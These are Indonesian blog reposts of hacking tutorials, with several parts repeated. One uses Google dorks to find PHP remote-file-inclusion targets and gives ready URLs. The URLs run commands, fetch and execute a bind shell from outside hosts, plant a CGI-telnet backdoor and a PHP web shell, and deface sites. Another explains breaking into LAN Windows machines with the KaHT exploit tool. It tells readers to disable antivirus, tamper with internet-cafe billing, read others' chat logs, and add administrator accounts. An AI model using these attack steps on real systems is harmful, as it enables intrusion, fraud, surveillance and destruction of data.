TRIK 9 HACKING
===========
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
--------------------------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "
masukkan passwordnya "n0fr13"
III. install shell php
1. buat url seperti ini :
"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
" http://www.target.com/target/log.php "
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html
thats all my friends. just try it !!!
Jumat, 29 Agustus 2008
SUPER KIDDIES HACKING: “PHP SUPER BUGS”
SUPER KIDDIES HACKING: “PHP SUPER BUGS”
Ditulis pada Februari 14, 2008 oleh yanuperwira
Berhubung server ada yang diserang, aq cari-cari file artikel jamannya seneng2 begadang ma internet dan dunia ingin tau supper tinggi. Maaf semuanya sebenarnya dah tau caranya tapi “GAK ADA WAKTU UNTUK BETULIN BUG ITU” modusnya sih seperti ini( artikel dibawah ) , mudah-mudahan menjadi referensi bagi programer lain.
File dengan CHMOD 777 dari jaman gak enak dulu, waktu bikin web itu alamiah. Kenapa alamiah karena buat upload file misal image. Wah klo sampek ke HACK gini gimana? YAA nerubah struktur codingnya, tp WEK haduh kelamaan BOS. Cara paling yahut ya dengan upload file dengan sistem FTP. Yuuk coding lagi, ngaku programer males coding TELA sampean.
SUPER KIDDIES HACKING: “PHP SUPER BUGS”
Author : K-159
Chanel : #indohackinglink, #hackercrew
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
——————————————————————————————————–
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “
3.eksekusi file httpd tadi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “
3. akses cgitelnet kita dengan membuka url :
” http://www.target.com/cgi-bin/test.pl “
masukkan passwordnya “n0fr13″
III. install shell php
1. buat url seperti ini :
“http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
” http://www.target.com/target/log.php “
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!! BUT DONT TRY ON MY SERVER -_-
Thank’s to Mamat
Ditulis pada Februari 14, 2008 oleh yanuperwira
Berhubung server ada yang diserang, aq cari-cari file artikel jamannya seneng2 begadang ma internet dan dunia ingin tau supper tinggi. Maaf semuanya sebenarnya dah tau caranya tapi “GAK ADA WAKTU UNTUK BETULIN BUG ITU” modusnya sih seperti ini( artikel dibawah ) , mudah-mudahan menjadi referensi bagi programer lain.
File dengan CHMOD 777 dari jaman gak enak dulu, waktu bikin web itu alamiah. Kenapa alamiah karena buat upload file misal image. Wah klo sampek ke HACK gini gimana? YAA nerubah struktur codingnya, tp WEK haduh kelamaan BOS. Cara paling yahut ya dengan upload file dengan sistem FTP. Yuuk coding lagi, ngaku programer males coding TELA sampean.
SUPER KIDDIES HACKING: “PHP SUPER BUGS”
Author : K-159
Chanel : #indohackinglink, #hackercrew
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
——————————————————————————————————–
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “
3.eksekusi file httpd tadi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “
4. buka telnet ke IP target sesuai dg port bindttynya
II. install Cgi-telnet
1.buat url seperti ini :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “
3. akses cgitelnet kita dengan membuka url :
” http://www.target.com/cgi-bin/test.pl “
masukkan passwordnya “n0fr13″
III. install shell php
1. buat url seperti ini :
“http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
” http://www.target.com/target/log.php “
IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!! BUT DONT TRY ON MY SERVER -_-
Thank’s to Mamat
Cara masuk di komputer lain lewat DOS (Windows XP / 2000)
Cara masuk di komputer lain lewat DOS (Windows XP / 2000)
Anda ingin
masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi
harddisk teman anda, membuat directory, membuat file, mendelete file atau
apa saja ? itu mudah, semua caranya ada disini.
Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu
internet Maniac (Internet Maniac.exe) … Download Interenet
Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name /
hostname
KaHT (KaHt.exe) … Download program hacker
KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara.
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program
tersebut, entah pake WINZIP atau pake apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda
dengan melihat para hostname dengan 2 cara.
Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera
muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)
:)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada
menu Search for other item pilihlah computers, lalu akan muncul Search for
computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network
Neighboure saja)
Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka
loe langsung aja jalankan program Internet Maniac
Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik
resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor
ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.
Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan
berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh
antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau
terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja
dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting,
tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt
Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh
bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di
C:\KaH) maka ketikkan "CD\KaHT" dan seterusnya.
Jika sudah, ini saatnya?
Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan
Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac
tadi itu lho.
Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka
anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda
akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah
pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe
Nah kalo udah begini kita bisa berkreasi :
Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server,
ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus
nanti ketahuan ama operator warnetnya, hehe.
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus /
kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut,
biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di
On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat
"/logs" maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka
cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log
hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe,
kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya
atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa
lho, delete aja file-file systemnya, hehe.
Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih
bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan
Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan
usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain
Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui
LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht
yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.
Melihat akses guest dan administrator di Windows
Ketik : net user
Melihat aktif tidaknya guest di Windows
Ketik : net user guest
Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add
Menghapus akses administrator
Ketik : net localgroup Users /delete
Catatan:
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah
tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab
anda tanpa kecuali.
Anda ingin
masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi
harddisk teman anda, membuat directory, membuat file, mendelete file atau
apa saja ? itu mudah, semua caranya ada disini.
Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu
internet Maniac (Internet Maniac.exe) … Download Interenet
Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name /
hostname
KaHT (KaHt.exe) … Download program hacker
KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara.
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program
tersebut, entah pake WINZIP atau pake apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda
dengan melihat para hostname dengan 2 cara.
Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera
muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)
:)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada
menu Search for other item pilihlah computers, lalu akan muncul Search for
computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network
Neighboure saja)
Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka
loe langsung aja jalankan program Internet Maniac
Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik
resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor
ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.
Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan
berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh
antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau
terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja
dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting,
tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt
Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh
bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di
C:\KaH) maka ketikkan "CD\KaHT" dan seterusnya.
Jika sudah, ini saatnya?
Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan
Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac
tadi itu lho.
Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka
anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda
akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah
pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe
Nah kalo udah begini kita bisa berkreasi :
Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server,
ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus
nanti ketahuan ama operator warnetnya, hehe.
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus /
kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut,
biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di
On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat
"/logs" maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka
cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log
hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe,
kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya
atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa
lho, delete aja file-file systemnya, hehe.
Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih
bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan
Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan
usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain
Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui
LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht
yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.
Melihat akses guest dan administrator di Windows
Ketik : net user
Melihat aktif tidaknya guest di Windows
Ketik : net user guest
Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user
2. Ketik : net localgroup Administrators
Menghapus akses administrator
Ketik : net localgroup Users
Catatan:
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah
tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab
anda tanpa kecuali.
TRIK 9 HACKING
TRIK 9 HACKING
Filed Under (All, Hacking, tips & trick) by Ph4][)HL1 R4Ph1Q1 on 24-04-2008
Tagged Under : All, Allinurl, Apa Saja, Bisa, Bugs, Cmd, Dg, Dsb, Friendship, google, Hacking, Homework, Injex, Joke, Juga, Kindness, Maka, Motivation, Nya, Spirit, Target Index, Thx, Tip & Trick
Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again :)
1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
